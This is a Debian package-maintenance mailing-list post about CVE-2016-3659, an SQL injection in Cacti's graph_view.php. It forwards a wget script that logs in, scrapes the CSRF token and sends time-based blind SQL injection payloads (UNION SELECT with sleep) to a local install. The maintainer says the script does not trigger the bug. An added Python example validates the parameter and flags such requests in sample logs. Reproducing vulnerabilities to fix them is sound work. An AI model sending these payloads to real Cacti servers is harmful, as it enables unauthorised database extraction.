[Pkg-cacti-maint] Bug#820521: cacti: CVE-2016-3659: SQL injection vulnerability in graph_view.php

Paul Gevers elbrus at debian.org
Fri Apr 29 04:33:48 UTC 2016


Control: tags -1 help

For the record of this bug.

I have not been able to reproduce this on my Debian system, and upstream
hasn't responded yet to the bug report. Any help in reproducing it and
providing a script to reproduce it is welcome. The script from the
upstream bug report does not reproduce the issue for me.

One data point, I have verified that the code we try to inject is valid
MySQL code in the Debian (sid) version and as such should delay if one
is able to trigger the vulnerability.

Paul

-------- Forwarded Message --------
Subject: reproducing vulnerability
Date: Sun, 10 Apr 2016 13:47:54 +0200
From: Paul Gevers <elbrus at debian.org>
To: Debian Security <security at debian.org>

Hi,

Call me dumb or ignorant, but even with multiple tries over the last
couple of days, I have not been able to reproduce a CVE¹ against my
package cacti. I have tried using wget with the code below and also in
my browser (iceweasel with "Web Developer" plugin) by changing "hidden"
fields to trigger the issue without success. Am I doing this wrong? Do
you have tips or tricks on how to test this kind of security issue?

(Obviously, I am not doubting the CVE itself, although it may be so that
Debian is not vulnerable. I would be surprised though.)

#### Initializing stuff
database_pw=theAdminPasswordHere
tmpFile1=$(mktemp)
tmpFile2=$(mktemp)
cookieFile=$(mktemp)
loadSaveCookie="--load-cookies $cookieFile --keep-session-cookies --save-cookies $cookieFile"

# Make sure we get the magic, this is stored in the cookies for future use.
wget --keep-session-cookies --save-cookies "$cookieFile" \
  --output-document="$tmpFile1" http://localhost/cacti/index.php
# Extract the CSRF token from the login form so the login POST is accepted.
magic=$(grep "name='__csrf_magic' value=" "$tmpFile1" | \
  sed "s/.*__csrf_magic' value=\"//" | sed "s/\" \/>//")
postData="action=login&login_username=admin&login_password=${database_pw}&__csrf_magic=${magic}"
wget $loadSaveCookie --post-data="$postData" \
  --output-document="$tmpFile2" http://localhost/cacti/index.php

#### and then the real tries here:
# CVE-2016-3659 Unfortunately, I am not able to trigger the issue
# (--timeout=10 is shorter than sleep(100), so a triggered delay shows up as a wget timeout)
wget $loadSaveCookie --timeout=10 --tries=1 \
  "http://localhost/cacti/graph_view.php?action=tree&tree_id=1&leaf_id=7&nodeid=node1_7&host_group_data=graph_template:1 union select case when ord(substring((select version()) from 1 for 1)) between 53 and 53 then sleep(100) else 0 end"

wget $loadSaveCookie --timeout=10 --tries=1 \
  --post-data="__csrf_magic=${magic}&action=tree&tree_id=1&leaf_id=7&nodeid=node1_7&host_group_data=graph_template:1%20union%20select%20case%20when%20ord(substring((select%20version())%20from%201%20for%201))%20between%2053%20and%2053%20then%20sleep(100)%20else%200%20end" \
  "http://localhost/cacti/graph_view.php"

Paul

¹ https://security-tracker.debian.org/tracker/CVE-2016-3659
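The thread above is about getting a time-based payload through the host_group_data parameter of graph_view.php. From the maintainer's side the more useful pieces are (a) a strict check on that parameter, so that anything beyond "prefix:id" is rejected before any SQL is built, and (b) a way to spot such requests in web-server logs. The example below is added here and is not Cacti code or anything from the bug report; it is written in Python rather than Cacti's PHP purely for illustration. The accepted value shapes ("graph_template:<id>" and "host:<id>"), the column names in FILTER_COLUMN and the access-log lines are all assumptions or constructed data, not taken from the Debian package.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Assumed legitimate shape of the host_group_data parameter: the bug report
# shows "graph_template:1"; "host:<id>" is assumed here as a second form.
HOST_GROUP_RE = re.compile(r"(graph_template|host):(\d{1,10})")

# Assumed mapping from the parameter prefix to the column the page filters on.
FILTER_COLUMN = {"graph_template": "graph_template_id", "host": "host_id"}

# Constructed Apache-style access-log lines. The second one carries a UNION
# suffix of the shape quoted in the bug report, percent-encoded as wget sends it.
SAMPLE_LOG = [
    '127.0.0.1 - - [29/Apr/2016:04:33:48 +0000] "GET /cacti/graph_view.php?action=tree&tree_id=1&leaf_id=7&host_group_data=graph_template:1 HTTP/1.1" 200 5120',
    '127.0.0.1 - - [29/Apr/2016:04:34:02 +0000] "GET /cacti/graph_view.php?action=tree&tree_id=1&host_group_data=graph_template:1%20union%20select%201 HTTP/1.1" 200 5120',
    '127.0.0.1 - - [29/Apr/2016:04:34:10 +0000] "GET /cacti/index.php HTTP/1.1" 200 2048',
]

REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')


def parse_host_group_data(value):
    """Return (kind, numeric id) for a well-formed value, or None if it must be rejected.

    fullmatch() means anything beyond "<prefix>:<digits>" (a space, a quote,
    a second SQL clause) fails the match, so no injected suffix survives.
    """
    m = HOST_GROUP_RE.fullmatch(value)
    if m is None:
        return None
    return m.group(1), int(m.group(2))


def build_filter(value):
    """Turn a validated host_group_data value into a parameterised WHERE fragment.

    The column name comes from a fixed table and the id is handed over as a
    bound parameter, so the request value is never spliced into query text.
    """
    parsed = parse_host_group_data(value)
    if parsed is None:
        raise ValueError("rejected host_group_data value")
    kind, ident = parsed
    return f"WHERE {FILTER_COLUMN[kind]} = %s", (ident,)


def flag_suspicious_requests(log_lines):
    """Return the access-log lines whose host_group_data parameter fails validation."""
    flagged = []
    for line in log_lines:
        m = REQUEST_RE.search(line)
        if m is None:
            continue
        # parse_qs percent-decodes, so "%20union%20..." becomes " union ..." here.
        query = parse_qs(urlsplit(m.group(1)).query, keep_blank_values=True)
        values = query.get("host_group_data", [])
        if any(parse_host_group_data(v) is None for v in values):
            flagged.append(line)
    return flagged


if __name__ == "__main__":
    for line in flag_suspicious_requests(SAMPLE_LOG):
        print("suspicious:", line)
```

Run against the constructed SAMPLE_LOG, only the second line is reported; the same parse_host_group_data() check, placed in front of the query builder, turns the whole family of "prefix:id<anything>" inputs into a rejected request instead of a query that sleeps.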
